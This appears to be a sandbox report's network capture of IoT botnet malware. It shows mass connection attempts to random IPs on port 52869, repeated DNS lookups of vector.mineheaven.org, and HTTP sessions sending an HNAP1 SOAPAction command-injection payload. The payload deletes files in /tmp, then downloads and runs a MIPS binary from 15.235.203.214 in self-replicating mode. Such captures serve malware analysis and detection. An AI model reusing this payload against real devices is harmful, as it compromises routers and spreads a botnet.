                                                Jul 20, 2024 23:05:35.011697054 CEST5286926966216.0.10.218192.168.2.14
                                                Jul 20, 2024 23:05:35.011701107 CEST5286926966175.238.184.182192.168.2.14
                                                Jul 20, 2024 23:05:35.011710882 CEST528692696689.159.59.12192.168.2.14
                                                Jul 20, 2024 23:05:35.011984110 CEST5286926966135.225.235.236192.168.2.14
                                                Jul 20, 2024 23:05:35.012105942 CEST5286926966122.163.189.150192.168.2.14
                                                Jul 20, 2024 23:05:35.012562990 CEST5286926966156.208.213.179192.168.2.14
                                                Jul 20, 2024 23:05:35.012809038 CEST528692696618.89.179.45192.168.2.14
                                                Jul 20, 2024 23:05:35.012814999 CEST5286926966172.246.192.149192.168.2.14
                                                Jul 20, 2024 23:05:35.012819052 CEST528692696660.18.87.242192.168.2.14
                                                Jul 20, 2024 23:05:35.012830019 CEST5286926966194.220.125.216192.168.2.14
                                                Jul 20, 2024 23:05:35.012835026 CEST528692696638.21.179.199192.168.2.14
                                                Jul 20, 2024 23:05:35.012845039 CEST528692696648.85.13.210192.168.2.14
                                                Jul 20, 2024 23:05:35.012850046 CEST528692696653.155.136.102192.168.2.14
                                                Jul 20, 2024 23:05:35.012855053 CEST5286926966198.31.87.139192.168.2.14
                                                Jul 20, 2024 23:05:35.012865067 CEST5286926966178.54.119.111192.168.2.14
                                                Jul 20, 2024 23:05:35.012868881 CEST5286926966188.86.140.89192.168.2.14
                                                Jul 20, 2024 23:05:35.013072014 CEST5286926966105.67.134.200192.168.2.14
                                                Jul 20, 2024 23:05:35.013214111 CEST528692696678.75.75.123192.168.2.14
                                                Jul 20, 2024 23:05:35.013219118 CEST528692696613.124.77.110192.168.2.14
                                                Jul 20, 2024 23:05:35.013536930 CEST5286926966140.145.194.213192.168.2.14
                                                Jul 20, 2024 23:05:35.013739109 CEST528692696657.95.17.99192.168.2.14
                                                Jul 20, 2024 23:05:35.013787985 CEST5286926966172.217.186.117192.168.2.14
                                                Jul 20, 2024 23:05:35.013792038 CEST528692696642.49.125.184192.168.2.14
                                                Jul 20, 2024 23:05:35.014102936 CEST528692696661.67.34.245192.168.2.14
                                                Jul 20, 2024 23:05:35.014250994 CEST5286926966123.70.169.33192.168.2.14
                                                Jul 20, 2024 23:05:35.014256001 CEST5286926966219.125.4.90192.168.2.14
                                                Jul 20, 2024 23:05:35.014487028 CEST528692696614.144.2.40192.168.2.14
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.14129.219.238.228
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.14112.104.200.113
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.14216.236.89.119
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.1454.54.59.153
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.1499.141.26.31
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.14171.91.137.39
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.14202.137.137.126
                                                Jul 20, 2024 23:05:35.014724970 CEST2696652869192.168.2.1473.109.58.148
                                                Jul 20, 2024 23:05:35.014914036 CEST528692696653.6.217.236192.168.2.14
                                                Jul 20, 2024 23:05:35.015084982 CEST52869269664.132.84.148192.168.2.14
                                                Jul 20, 2024 23:05:35.015470982 CEST528692696645.190.239.42192.168.2.14
                                                Jul 20, 2024 23:05:35.015604973 CEST5286926966131.197.10.9192.168.2.14
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.14200.150.155.147
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.14199.128.218.70
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.14145.85.198.106
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.1453.31.92.164
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.1440.118.130.202
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.1442.25.96.190
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.1468.57.60.147
                                                Jul 20, 2024 23:05:35.015671968 CEST2696652869192.168.2.14184.55.33.56
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.14193.120.166.63
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.14150.164.24.216
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.14168.253.125.205
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.1474.51.16.134
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.14109.72.104.49
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.1496.85.17.59
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.1435.193.107.88
                                                Jul 20, 2024 23:05:35.015814066 CEST2696652869192.168.2.1479.100.203.180
                                                Jul 20, 2024 23:05:35.015825033 CEST5286926966117.156.46.148192.168.2.14
                                                Jul 20, 2024 23:05:35.016107082 CEST528692696692.52.164.214192.168.2.14
                                                Jul 20, 2024 23:05:35.016119003 CEST5286926966200.49.22.222192.168.2.14
                                                Jul 20, 2024 23:05:35.016135931 CEST5286926966183.221.111.244192.168.2.14
                                                Jul 20, 2024 23:05:35.016405106 CEST528692696691.231.103.146192.168.2.14
                                                Jul 20, 2024 23:05:35.016534090 CEST5286926966223.8.84.140192.168.2.14
                                                Jul 20, 2024 23:05:35.016689062 CEST2696652869192.168.2.14165.16.25.163
                                                Jul 20, 2024 23:05:35.016689062 CEST2696652869192.168.2.1478.100.205.170
                                                Jul 20, 2024 23:05:35.016689062 CEST2696652869192.168.2.14217.92.162.39
                                                Jul 20, 2024 23:05:35.016690016 CEST2696652869192.168.2.14166.185.122.74
                                                Jul 20, 2024 23:05:35.016690016 CEST2696652869192.168.2.14199.59.245.80
                                                Jul 20, 2024 23:05:35.016690016 CEST2696652869192.168.2.14105.37.118.61
                                                Jul 20, 2024 23:05:35.016690016 CEST2696652869192.168.2.1465.153.164.85
                                                Jul 20, 2024 23:05:35.016690016 CEST2696652869192.168.2.14206.37.165.172
                                                Jul 20, 2024 23:05:35.016712904 CEST528692696699.124.91.171192.168.2.14
                                                Jul 20, 2024 23:05:35.016966105 CEST528692696612.182.1.101192.168.2.14
                                                Jul 20, 2024 23:05:35.017030001 CEST528692696658.217.134.38192.168.2.14
                                                Jul 20, 2024 23:05:35.017493963 CEST5286926966132.204.68.1192.168.2.14
                                                Jul 20, 2024 23:05:35.017630100 CEST528692696623.20.9.101192.168.2.14
                                                Jul 20, 2024 23:05:35.017772913 CEST52869269664.14.185.188192.168.2.14
                                                Jul 20, 2024 23:05:35.017906904 CEST5286926966203.149.97.158192.168.2.14
                                                Jul 20, 2024 23:05:35.017911911 CEST528692696659.76.110.155192.168.2.14
                                                Jul 20, 2024 23:05:35.018203974 CEST5286926966155.88.79.184192.168.2.14
                                                Jul 20, 2024 23:05:35.018321037 CEST5286926966201.25.115.226192.168.2.14
                                                Jul 20, 2024 23:05:35.018394947 CEST5286926966181.138.190.163192.168.2.14
                                                Jul 20, 2024 23:05:35.018564939 CEST5286926966188.240.117.23192.168.2.14
                                                Jul 20, 2024 23:05:35.018789053 CEST528692696693.158.134.171192.168.2.14
                                                Jul 20, 2024 23:05:35.018795013 CEST528692696698.105.73.60192.168.2.14
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.1476.101.247.91
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14166.179.216.195
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14137.64.107.137
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.1438.11.130.247
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14189.184.127.219
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14211.104.177.240
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14191.10.60.151
                                                Jul 20, 2024 23:05:35.018886089 CEST2696652869192.168.2.14192.108.1.150
                                                Jul 20, 2024 23:05:35.018985987 CEST5286926966142.31.25.173192.168.2.14
                                                Jul 20, 2024 23:05:35.019443989 CEST5286926966135.51.102.2192.168.2.14
                                                Jul 20, 2024 23:05:35.019495010 CEST5286926966122.61.165.38192.168.2.14
                                                Jul 20, 2024 23:05:35.019807100 CEST5286926966219.158.44.53192.168.2.14
                                                Jul 20, 2024 23:05:35.019857883 CEST5286926966208.45.147.126192.168.2.14
                                                Jul 20, 2024 23:05:35.020129919 CEST5286926966140.175.149.147192.168.2.14
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14133.28.127.175
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14182.65.72.167
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14102.7.239.110
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14133.1.71.70
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14108.173.222.51
                                                Jul 20, 2024 23:05:35.021117926 CEST2696652869192.168.2.14136.114.87.131
                                                Jul 20, 2024 23:05:35.021119118 CEST2696652869192.168.2.1450.97.207.220
                                                Jul 20, 2024 23:05:35.021119118 CEST2696652869192.168.2.14123.249.168.44
                                                Jul 20, 2024 23:05:35.022002935 CEST5286926966147.51.213.122192.168.2.14
                                                Jul 20, 2024 23:05:35.022524118 CEST528692696666.198.13.178192.168.2.14
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.14222.133.35.179
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.1466.164.158.80
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.14118.29.180.126
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.1446.52.145.40
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.1489.105.172.94
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.1467.201.202.84
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.14123.235.222.123
                                                Jul 20, 2024 23:05:35.023530006 CEST2696652869192.168.2.14149.35.124.180
                                                Jul 20, 2024 23:05:35.023673058 CEST528692696681.249.229.153192.168.2.14
                                                Jul 20, 2024 23:05:35.023678064 CEST5286926966184.22.229.212192.168.2.14
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.1453.250.245.166
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.14153.178.0.68
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.1419.196.241.92
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.14180.12.5.48
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.1444.243.185.92
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.14135.15.92.191
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.14210.115.135.171
                                                Jul 20, 2024 23:05:35.024250984 CEST2696652869192.168.2.1419.140.205.151
                                                Jul 20, 2024 23:05:35.024389982 CEST2696652869192.168.2.1445.210.22.216
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.14115.111.247.125
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.1412.6.100.219
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.1448.33.82.96
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.14182.35.218.14
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.1413.66.177.116
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.14163.35.196.145
                                                Jul 20, 2024 23:05:35.024390936 CEST2696652869192.168.2.14170.31.76.85
                                                Jul 20, 2024 23:05:35.024399996 CEST528692696623.252.118.102192.168.2.14
                                                Jul 20, 2024 23:05:35.024405003 CEST528692696644.171.109.98192.168.2.14
                                                Jul 20, 2024 23:05:35.024414062 CEST5286926966200.150.155.147192.168.2.14
                                                Jul 20, 2024 23:05:35.024507999 CEST5286926966103.44.107.56192.168.2.14
                                                Jul 20, 2024 23:05:35.024512053 CEST5286926966193.120.166.63192.168.2.14
                                                Jul 20, 2024 23:05:35.024522066 CEST528692696645.191.119.100192.168.2.14
                                                Jul 20, 2024 23:05:35.024525881 CEST5286926966165.16.25.163192.168.2.14
                                                Jul 20, 2024 23:05:35.024534941 CEST5286926966150.164.24.216192.168.2.14
                                                Jul 20, 2024 23:05:35.024539948 CEST5286926966117.253.27.237192.168.2.14
                                                Jul 20, 2024 23:05:35.024549007 CEST5286926966199.128.218.70192.168.2.14
                                                Jul 20, 2024 23:05:35.024806976 CEST5286926966129.219.238.228192.168.2.14
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.14208.157.137.15
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.1442.188.23.123
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.1462.252.54.187
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.14146.18.94.104
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.1445.178.210.169
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.1497.176.250.37
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.1465.239.147.130
                                                Jul 20, 2024 23:05:35.025562048 CEST2696652869192.168.2.14119.142.129.223
                                                Jul 20, 2024 23:05:35.025592089 CEST5286926966153.9.235.134192.168.2.14
                                                Jul 20, 2024 23:05:35.025598049 CEST528692696689.192.29.249192.168.2.14
                                                Jul 20, 2024 23:05:35.028111935 CEST5286926966195.75.113.128192.168.2.14
                                                Jul 20, 2024 23:05:35.028116941 CEST528692696671.9.105.224192.168.2.14
                                                Jul 20, 2024 23:05:35.028120995 CEST5286926966145.85.198.106192.168.2.14
                                                Jul 20, 2024 23:05:35.028404951 CEST528692696676.101.247.91192.168.2.14
                                                Jul 20, 2024 23:05:35.028409958 CEST528692696678.100.205.170192.168.2.14
                                                Jul 20, 2024 23:05:35.028419971 CEST5286926966168.253.125.205192.168.2.14
                                                Jul 20, 2024 23:05:35.028424978 CEST5286926966166.179.216.195192.168.2.14
                                                Jul 20, 2024 23:05:35.028429985 CEST5286926966112.104.200.113192.168.2.14
                                                Jul 20, 2024 23:05:35.028434038 CEST528692696653.31.92.164192.168.2.14
                                                Jul 20, 2024 23:05:35.028439045 CEST5286926966217.92.162.39192.168.2.14
                                                Jul 20, 2024 23:05:35.028444052 CEST528692696649.124.80.132192.168.2.14
                                                Jul 20, 2024 23:05:35.028448105 CEST5286926966137.64.107.137192.168.2.14
                                                Jul 20, 2024 23:05:35.028453112 CEST5286926966165.216.144.60192.168.2.14
                                                Jul 20, 2024 23:05:35.028461933 CEST528692696638.11.130.247192.168.2.14
                                                Jul 20, 2024 23:05:35.028466940 CEST5286926966166.185.122.74192.168.2.14
                                                Jul 20, 2024 23:05:35.028522968 CEST528692696654.35.143.160192.168.2.14
                                                Jul 20, 2024 23:05:35.028527975 CEST5286926966216.236.89.119192.168.2.14
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14118.157.227.200
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14164.98.95.163
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.1457.146.185.124
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.1442.177.247.117
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14135.93.231.58
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14106.139.147.61
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14120.96.136.122
                                                Jul 20, 2024 23:05:35.029303074 CEST2696652869192.168.2.14208.118.157.82
                                                Jul 20, 2024 23:05:35.029908895 CEST5286926966189.184.127.219192.168.2.14
                                                Jul 20, 2024 23:05:35.029913902 CEST528692696674.51.16.134192.168.2.14
                                                Jul 20, 2024 23:05:35.029918909 CEST5286926966211.104.177.240192.168.2.14
                                                Jul 20, 2024 23:05:35.030185938 CEST528692696640.118.130.202192.168.2.14
                                                Jul 20, 2024 23:05:35.030190945 CEST5286926966153.167.24.203192.168.2.14
                                                Jul 20, 2024 23:05:35.030200005 CEST528692696642.25.96.190192.168.2.14
                                                Jul 20, 2024 23:05:35.030204058 CEST5286926966166.7.76.47192.168.2.14
                                                Jul 20, 2024 23:05:35.030208111 CEST5286926966109.72.104.49192.168.2.14
                                                Jul 20, 2024 23:05:35.030216932 CEST528692696661.147.94.117192.168.2.14
                                                Jul 20, 2024 23:05:35.030931950 CEST528692696668.57.60.147192.168.2.14
                                                Jul 20, 2024 23:05:35.030937910 CEST5286926966222.133.35.179192.168.2.14
                                                Jul 20, 2024 23:05:35.030946970 CEST5286926966191.10.60.151192.168.2.14
                                                Jul 20, 2024 23:05:35.030951977 CEST528692696696.85.17.59192.168.2.14
                                                Jul 20, 2024 23:05:35.030961037 CEST5286926966192.108.1.150192.168.2.14
                                                Jul 20, 2024 23:05:35.030965090 CEST5286926966184.55.33.56192.168.2.14
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.1442.231.189.7
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.14223.221.177.33
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.14159.85.249.205
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.14178.74.43.243
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.1436.65.164.143
                                                Jul 20, 2024 23:05:35.031167984 CEST5377852869192.168.2.14106.223.167.59
                                                Jul 20, 2024 23:05:35.031167984 CEST2696652869192.168.2.14116.197.2.184
                                                Jul 20, 2024 23:05:35.031208038 CEST528692696666.164.158.80192.168.2.14
                                                Jul 20, 2024 23:05:35.031213045 CEST528692696635.193.107.88192.168.2.14
                                                Jul 20, 2024 23:05:35.031222105 CEST528692696645.210.22.216192.168.2.14
                                                Jul 20, 2024 23:05:35.031227112 CEST5286926966118.29.180.126192.168.2.14
                                                Jul 20, 2024 23:05:35.031230927 CEST5286926966115.111.247.125192.168.2.14
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14103.120.34.178
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14179.197.206.104
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.1482.136.137.5
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14159.199.31.212
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14194.5.123.230
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.1468.166.233.51
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14209.114.146.198
                                                Jul 20, 2024 23:05:35.031532049 CEST2696652869192.168.2.14165.200.33.23
                                                Jul 20, 2024 23:05:35.032780886 CEST2696652869192.168.2.1473.64.35.34
                                                Jul 20, 2024 23:05:35.032780886 CEST2696652869192.168.2.14135.244.123.67
                                                Jul 20, 2024 23:05:35.032780886 CEST2696652869192.168.2.1481.46.78.229
                                                Jul 20, 2024 23:05:35.032780886 CEST2696652869192.168.2.14144.109.73.229
                                                Jul 20, 2024 23:05:35.032780886 CEST2696652869192.168.2.14130.92.238.93
                                                Jul 20, 2024 23:05:35.032782078 CEST2696652869192.168.2.1452.50.252.115
                                                Jul 20, 2024 23:05:35.032782078 CEST2696652869192.168.2.1435.49.233.153
                                                Jul 20, 2024 23:05:35.032782078 CEST2696652869192.168.2.14173.6.29.73
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.14149.245.1.45
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.14163.242.82.200
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.14177.115.10.211
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.14103.128.183.114
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.1488.41.179.45
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.1441.83.92.88
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.1472.196.169.241
                                                Jul 20, 2024 23:05:35.033925056 CEST2696652869192.168.2.14141.254.176.177
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14210.120.32.33
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14157.71.183.39
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14128.145.102.159
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.1423.27.47.103
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14175.33.218.208
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14183.186.200.174
                                                Jul 20, 2024 23:05:35.034764051 CEST2696652869192.168.2.14153.194.202.211
                                                Jul 20, 2024 23:05:35.034765005 CEST2696652869192.168.2.14143.117.248.108
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.1418.56.17.29
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.1486.235.10.74
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.14211.229.68.223
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.14153.11.188.2
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.14168.234.146.248
                                                Jul 20, 2024 23:05:35.034975052 CEST2696652869192.168.2.14151.102.255.162
                                                Jul 20, 2024 23:05:35.034976006 CEST2696652869192.168.2.14196.5.99.24
                                                Jul 20, 2024 23:05:35.034976006 CEST2696652869192.168.2.14189.84.116.20
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14199.181.57.142
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14165.131.206.132
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.1454.111.110.146
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14197.207.114.175
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14138.100.54.190
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14205.228.227.19
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14163.167.217.148
                                                Jul 20, 2024 23:05:35.035449028 CEST2696652869192.168.2.14139.230.194.131
                                                Jul 20, 2024 23:05:35.036544085 CEST5286926966115.111.247.125192.168.2.14
                                                Jul 20, 2024 23:05:35.036545992 CEST528692696653.250.245.166192.168.2.14
                                                Jul 20, 2024 23:05:35.036550045 CEST528692696676.27.132.212192.168.2.14
                                                Jul 20, 2024 23:05:35.036550999 CEST528692696612.6.100.219192.168.2.14
                                                Jul 20, 2024 23:05:35.036551952 CEST5286926966153.178.0.68192.168.2.14
                                                Jul 20, 2024 23:05:35.036554098 CEST528692696654.54.59.153192.168.2.14
                                                Jul 20, 2024 23:05:35.036555052 CEST5286926966199.59.245.80192.168.2.14
                                                Jul 20, 2024 23:05:35.036555052 CEST5286926966208.157.137.15192.168.2.14
                                                Jul 20, 2024 23:05:35.036556005 CEST528692696699.141.26.31192.168.2.14
                                                Jul 20, 2024 23:05:35.036556959 CEST528692696642.188.23.123192.168.2.14
                                                Jul 20, 2024 23:05:35.036556959 CEST5286926966105.37.118.61192.168.2.14
                                                Jul 20, 2024 23:05:35.036557913 CEST528692696619.196.241.92192.168.2.14
                                                Jul 20, 2024 23:05:35.036557913 CEST528692696648.33.82.96192.168.2.14
                                                Jul 20, 2024 23:05:35.036559105 CEST528692696646.52.145.40192.168.2.14
                                                Jul 20, 2024 23:05:35.036560059 CEST5286926966133.28.127.175192.168.2.14
                                                Jul 20, 2024 23:05:35.036560059 CEST528692696689.105.172.94192.168.2.14
                                                Jul 20, 2024 23:05:35.036561012 CEST528692696662.252.54.187192.168.2.14
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jul 20, 2024 23:05:32.029555082 CEST192.168.2.148.8.8.80x93ddStandard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:38.906868935 CEST192.168.2.148.8.8.80xb0cdStandard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:47.280273914 CEST192.168.2.148.8.8.80xe896Standard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:55.283284903 CEST192.168.2.148.8.8.80x205eStandard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:06:12.324867010 CEST192.168.2.148.8.8.80xd309Standard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:06:19.855885983 CEST192.168.2.148.8.8.80xd309Standard query (0)vector.mineheaven.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jul 20, 2024 23:05:32.037667036 CEST8.8.8.8192.168.2.140x93ddNo error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:38.916188955 CEST8.8.8.8192.168.2.140xb0cdNo error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:47.297478914 CEST8.8.8.8192.168.2.140xe896No error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:05:55.290860891 CEST8.8.8.8192.168.2.140x205eNo error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                                Jul 20, 2024 23:06:19.959544897 CEST8.8.8.8192.168.2.140xd309No error (0)vector.mineheaven.org15.235.203.214A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.1443786216.109.199.2498081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.385437012 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.1441568217.229.232.1328081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.393894911 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
